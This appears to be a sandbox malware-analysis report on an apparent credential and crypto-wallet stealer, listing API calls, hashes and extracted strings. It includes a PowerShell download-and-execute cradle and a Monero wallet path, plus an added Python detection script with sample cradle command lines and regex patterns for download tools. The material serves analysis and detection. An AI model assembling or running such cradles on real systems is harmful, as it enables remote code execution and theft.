                          • Instruction Fuzzy Hash: FEF05830908399EFD344AFE0E909B2CBF74FB08703F0402D8E609A7690EA705F419B96
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00914FCA
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00914FD1
                          • InternetOpenA.WININET(00930DDF,00000000,00000000,00000000,00000000), ref: 00914FEA
                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00915011
                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00915041
                          • InternetCloseHandle.WININET(?), ref: 009150B9
                          • InternetCloseHandle.WININET(?), ref: 009150C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                          • String ID:
                          • API String ID: 3066467675-0
                          • Opcode ID: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                          • Instruction ID: c457839a0055d04b3e07c23f0b3590f04640912a1f8386b4d42d165e487f37ff
                          • Opcode Fuzzy Hash: 2e54e49c35aa63557f972693322560a751f8571213cc94c43b6e6bfc47895ec0
                          • Instruction Fuzzy Hash: 4A31E6B4A00218EBDB20CF94DC85BDDB7B4EB48705F5081D9EA09B7281DB746EC58F99
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0104FDC8,00000000,?,00930E2C,00000000,?,00000000), ref: 00928130
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00928137
                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00928158
                          • wsprintfA.USER32 ref: 009281AC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                          • String ID: %d MB$@
                          • API String ID: 2922868504-3474575989
                          • Opcode ID: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                          • Instruction ID: 3ce7f2e618f87c28c0a59267513e8a838ea814e13cadd934e54ebdc8ab6693ce
                          • Opcode Fuzzy Hash: 245ced5b20bc54ee998f254ad3f215e7fdedfab6a5c781c5d324848ec585b404
                          • Instruction Fuzzy Hash: FC21FCB1945218ABDB00DFD4DC49FAFB7B8FB44715F104609F605BB284DB7859018BA5
                          APIs
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00928426
                          • wsprintfA.USER32 ref: 00928459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0092847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0092848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00928499
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          • RegQueryValueExA.ADVAPI32(00000000,01050038,00000000,000F003F,?,00000400), ref: 009284EC
                          • lstrlen.KERNEL32(?), ref: 00928501
                          • RegQueryValueExA.ADVAPI32(00000000,0104FFF0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00930B34), ref: 00928599
                          • RegCloseKey.ADVAPI32(00000000), ref: 00928608
                          • RegCloseKey.ADVAPI32(00000000), ref: 0092861A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                           • Associated: 00000000.00000002.1746202466.0000000000910000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009C1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009CD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.00000000009F2000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746217241.0000000000B5A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000B6E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000CF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DD4000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E00000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746375557.0000000000E0E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746689438.0000000000E0F000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746906600.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1746933560.0000000000FAA000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                          • String ID: %s\%s
                          • API String ID: 3896182533-4073750446
                          • Opcode ID: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                          • Instruction ID: 2bc31df3598b4c3253c38e3aec46fc34f3a3242664f43d265291cac188a6283e
                          • Opcode Fuzzy Hash: 25e6de623eede54569204b696e3ac1bdb3cfc7f6ceb08771526e826b8f368cef
                          • Instruction Fuzzy Hash: 7721F6B1910228ABDB24DB54DC85FE9B7B8FB48701F0086D8E609A6180DE716A85CF94
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009276A4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 009276AB
                          • RegOpenKeyExA.ADVAPI32(80000002,0103D158,00000000,00020119,00000000), ref: 009276DD
                          • RegQueryValueExA.ADVAPI32(00000000,0104FFA8,00000000,00000000,?,000000FF), ref: 009276FE
                          • RegCloseKey.ADVAPI32(00000000), ref: 00927708
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                          • Instruction ID: 295b56314a6c16f230fac185b47ee8f7867d1285545750b30fd361e040042740
                          • Opcode Fuzzy Hash: 760ce3c3c43105e33fb521fa81fc5bc713520a8a366f1ab323c91731ea62e6bc
                          • Instruction Fuzzy Hash: B5014FB5A04308BFDB00DBE4EC59F6DB7BCEB48702F104594FA04B7294EA7499048F51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927734
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0092773B
                          • RegOpenKeyExA.ADVAPI32(80000002,0103D158,00000000,00020119,009276B9), ref: 0092775B
                          • RegQueryValueExA.ADVAPI32(009276B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0092777A
                          • RegCloseKey.ADVAPI32(009276B9), ref: 00927784
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                          • Instruction ID: 64b37819ded1e9115482bbd54286d34381d3acfc3e876cb881c505ce9a7ed216
                          • Opcode Fuzzy Hash: c2fc9a4bb455959c46b05355c665d1d35bccdf1c9382bcbf6219c8147798063e
                          • Instruction Fuzzy Hash: 0601F4B5A40308BFD700DBE4DC49FAEB7B8EB48705F104695FA05B7281DA7059408F51
                          APIs
                          • memset.MSVCRT ref: 009240D5
                          • RegOpenKeyExA.ADVAPI32(80000001,0104F8C0,00000000,00020119,?), ref: 009240F4
                          • RegQueryValueExA.ADVAPI32(?,01050230,00000000,00000000,00000000,000000FF), ref: 00924118
                          • RegCloseKey.ADVAPI32(?), ref: 00924122
                          • lstrcat.KERNEL32(?,00000000), ref: 00924147
                          • lstrcat.KERNEL32(?,010500E0), ref: 0092415B
                          Yara matches
                          Similarity
                          • API ID: lstrcat$CloseOpenQueryValuememset
                          • String ID:
                          • API String ID: 2623679115-0
                          • Opcode ID: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                          • Instruction ID: f6ad910a75ef1c272c20282cca9718f7b528261db83c42ee5a854704c2de1b8c
                          • Opcode Fuzzy Hash: 8af9770a1a12d8f191822f7f30cbf12085384ef07fbb323c70e4e25b4b1d5633
                          • Instruction Fuzzy Hash: 68418BB6D1020C6BDB14EBA0EC56FFE773DAB8C300F004598B71657185EE755B888B92
                          APIs
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                          • ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                          • LocalFree.KERNEL32(0091148F), ref: 00919A90
                          • CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                          • Instruction ID: ecb4b1cbc255769e876f2461688dc3d8e438ef5d75e75d7664faa234bd991594
                          • Opcode Fuzzy Hash: 9f94b449426ccb0d70c7fe8dd0f5833ef47ff40275afc434ef870bf2c4261fd1
                          • Instruction Fuzzy Hash: 17312A74A00209EFDB14CF94D895BEE77B9FF48301F108198E901A7290DB75A985CFA1
                          APIs
                          Strings
                          Yara matches
                          Similarity
                          • API ID: String___crt$Typememset
                          • String ID:
                          • API String ID: 3530896902-3916222277
                          • Opcode ID: 752ec40b3d7e58f61c83b083da4ad3a40eab58307d02e1172123830afdb15f03
                          • Instruction ID: fe202ce327b00ed975f5692ca775184f756997d81929f2656b53c005906f77e3
                          • Opcode Fuzzy Hash: 752ec40b3d7e58f61c83b083da4ad3a40eab58307d02e1172123830afdb15f03
                          • Instruction Fuzzy Hash: E341F6F51007AC5FDB218B24AC84FFFBBEC9F45704F1444E8E98A86186D2719A848F60
                          APIs
                          • lstrcat.KERNEL32(?,010502F0), ref: 009247DB
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00924801
                          • lstrcat.KERNEL32(?,?), ref: 00924820
                          • lstrcat.KERNEL32(?,?), ref: 00924834
                          • lstrcat.KERNEL32(?,0103C748), ref: 00924847
                          • lstrcat.KERNEL32(?,?), ref: 0092485B
                          • lstrcat.KERNEL32(?,0104F5E0), ref: 0092486F
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 00928D90: GetFileAttributesA.KERNEL32(00000000,?,00911B54,?,?,0093564C,?,?,00930E1F), ref: 00928D9F
                            • Part of subcall function 00924570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00924580
                            • Part of subcall function 00924570: RtlAllocateHeap.NTDLL(00000000), ref: 00924587
                            • Part of subcall function 00924570: wsprintfA.USER32 ref: 009245A6
                            • Part of subcall function 00924570: FindFirstFileA.KERNEL32(?,?), ref: 009245BD
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                          • String ID:
                          • API String ID: 2540262943-0
                          • Opcode ID: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                          • Instruction ID: 556a604226cd32ac3f0389388ee588e2261b9808b88ebf299b21e6c45a806e22
                          • Opcode Fuzzy Hash: 79b0a7453b63971a9d6a4fc7ae654dc107a95cd6c848a88c932befcc1f59909d
                          • Instruction Fuzzy Hash: D83153B690031867CB10F7B0EC85FEE737CAB98700F404989B355A6095EEB4A7C98B95
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00922D85
                          Strings
                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00922CC4
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00922D04
                          • ')", xrefs: 00922CB3
                          • <, xrefs: 00922D39
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 3031569214-898575020
                          • Opcode ID: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                          • Instruction ID: e3063e2e6445b9f8fc2df18137ebdfa8332d8efe927bf819dca40c9bbb6b9939
                          • Opcode Fuzzy Hash: d7062f5a0cac7100957e7d69f9f7e42a8ff99cf32b7494a2dba4909ec0f52dd7
                          • Instruction Fuzzy Hash: D641DF72D102189BDB14FFA0E892BDDB778AF94300F404159F006A7199DF746A4ACF95
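The function above is the one behind the "Yara detected Powershell download and execute" signature: the three string fragments at xrefs 00922CC4, 00922CB3 and 00922D04 are concatenated around a URL into `-nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"` (`-nop` is -NoProfile, `-c` is -Command) and handed to ShellExecuteEx, whose 0x3C-byte SHELLEXECUTEINFO argument is consistent with a 32-bit caller, which also explains the hard-coded SysWOW64 powershell.exe path. The following Python is an added example, not code from the sample or from the report: a small process-creation triage routine that flags this download cradle, decodes `-EncodedCommand` payloads before scanning them, and weighs a few supporting indicators. The event records, weights and alert threshold are constructed for illustration and should be tuned against your own baseline.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Constructed sample process-creation records (Sysmon Event ID 1 style); these are
# NOT events from the report's sandbox run: (parent_image, image, command_line).
_ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
    .encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    ("C:\\Users\\user\\Desktop\\file.exe",
     "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -nop -c \"iex(New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""),
    ("C:\\Windows\\explorer.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"),
    ("C:\\Windows\\System32\\cmd.exe",
     "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "powershell -nop -w hidden -enc " + _ENC_PAYLOAD),
]

# Hypothetical weights: tune them against legitimate PowerShell use in your estate.
WEIGHTS = {
    "download_cradle": 5,                     # iex / Invoke-Expression fed by a network download
    "encoded_command": 3,
    "hidden_window": 2,
    "wow64_powershell_from_user_profile": 2,  # 32-bit host launched from a user-writable path
    "no_profile": 1,
    "execution_policy_bypass": 1,
}
ALERT_THRESHOLD = 4

_IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
_NET = re.compile(r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
                  r"invoke-restmethod|\birm\b|\bcurl\b|\bwget\b|start-bitstransfer", re.I)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
_HIDDEN = re.compile(r"-w[a-z]*\s+h(?:idden)?\b", re.I)
_NOP = re.compile(r"-nop(?:rofile)?\b", re.I)
_BYPASS = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE plaintext behind -e/-enc/-EncodedCommand, or '' if absent or invalid."""
    m = _ENC.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return ""


@dataclass
class Finding:
    score: int = 0
    tags: list = field(default_factory=list)
    decoded: str = ""

    @property
    def alert(self) -> bool:
        return self.score >= ALERT_THRESHOLD


def analyze(parent: str, image: str, cmdline: str) -> Finding:
    f = Finding()
    f.decoded = decode_encoded_command(cmdline)
    # Scan the literal command line and the decoded payload together: the cradle is
    # often only visible after base64/UTF-16LE decoding.
    text = cmdline + "\n" + f.decoded
    if _IEX.search(text) and _NET.search(text):
        f.tags.append("download_cradle")
    if f.decoded:
        f.tags.append("encoded_command")
    if _HIDDEN.search(cmdline):
        f.tags.append("hidden_window")
    if _NOP.search(cmdline):
        f.tags.append("no_profile")
    if _BYPASS.search(cmdline):
        f.tags.append("execution_policy_bypass")
    if "\\syswow64\\" in image.lower() and parent.lower().startswith("c:\\users\\"):
        f.tags.append("wow64_powershell_from_user_profile")
    f.score = sum(WEIGHTS[t] for t in f.tags)
    return f


def triage(events=SAMPLE_EVENTS):
    """Run analyze() over a list of (parent, image, cmdline) records."""
    return [analyze(*e) for e in events]


if __name__ == "__main__":
    for (parent, image, cmd), f in zip(SAMPLE_EVENTS, triage()):
        print("ALERT" if f.alert else "ok   ", f.score, f.tags, cmd[:60])
```

The second constructed record (an admin script run with -NoProfile and -ExecutionPolicy Bypass from explorer.exe) scores below the threshold on purpose: those two switches are common in legitimate automation, so the rule leans on the cradle itself and on the parent/image combination the report shows (a user-profile executable spawning the 32-bit PowerShell host) rather than on switches alone.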
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00919F41
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$AllocLocal
                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                          • API String ID: 4171519190-1096346117
                          • Opcode ID: aedd562587993b96604da1cd42065d034c87b9efc5b815f6a2eb4b0b687b40a7
                          • Instruction ID: f00404eca68d20e72506d9056f8195bec9fd2e043202f938e63dca172372dc8e
                          • Opcode Fuzzy Hash: aedd562587993b96604da1cd42065d034c87b9efc5b815f6a2eb4b0b687b40a7
                          • Instruction Fuzzy Hash: 02616D71A0021CAFDB24EFA4DC96FEE7779AF85304F408018F90A9B195EB746A45CB52
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0092696C
                          • sscanf.NTDLL ref: 00926999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009269C0
                          • ExitProcess.KERNEL32 ref: 009269DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927E37
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00927E3E
                          • RegOpenKeyExA.ADVAPI32(80000002,0103D1C8,00000000,00020119,?), ref: 00927E5E
                          • RegQueryValueExA.ADVAPI32(?,0104F8E0,00000000,00000000,000000FF,000000FF), ref: 00927E7F
                          • RegCloseKey.ADVAPI32(?), ref: 00927E92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          APIs
                          • StrStrA.SHLWAPI(0104FEB8,?,?,?,0092140C,?,0104FEB8,00000000), ref: 0092926C
                          • lstrcpyn.KERNEL32(00B5AB88,0104FEB8,0104FEB8,?,0092140C,?,0104FEB8), ref: 00929290
                          • lstrlen.KERNEL32(?,?,0092140C,?,0104FEB8), ref: 009292A7
                          • wsprintfA.USER32 ref: 009292C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpynlstrlenwsprintf
                          • String ID: %s%s
                          • API String ID: 1206339513-3252725368
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009112B4
                          • RtlAllocateHeap.NTDLL(00000000), ref: 009112BB
                          • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009112D7
                          • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009112F5
                          • RegCloseKey.ADVAPI32(?), ref: 009112FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00926663
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00926726
                          • ExitProcess.KERNEL32 ref: 00926755
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                          • String ID: <
                          • API String ID: 1148417306-4251816714
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00930E28,00000000,?), ref: 0092882F
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00928836
                          • wsprintfA.USER32 ref: 00928850
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0092951E,00000000), ref: 00928D5B
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00928D62
                          • wsprintfW.USER32 ref: 00928D78
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesswsprintf
                          • String ID: %hs
                          • API String ID: 769748085-2783943728
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091A2E1
                          • lstrlen.KERNEL32(00000000,00000000), ref: 0091A3FF
                          • lstrlen.KERNEL32(00000000), ref: 0091A6BC
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                          • DeleteFileA.KERNEL32(00000000), ref: 0091A743
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
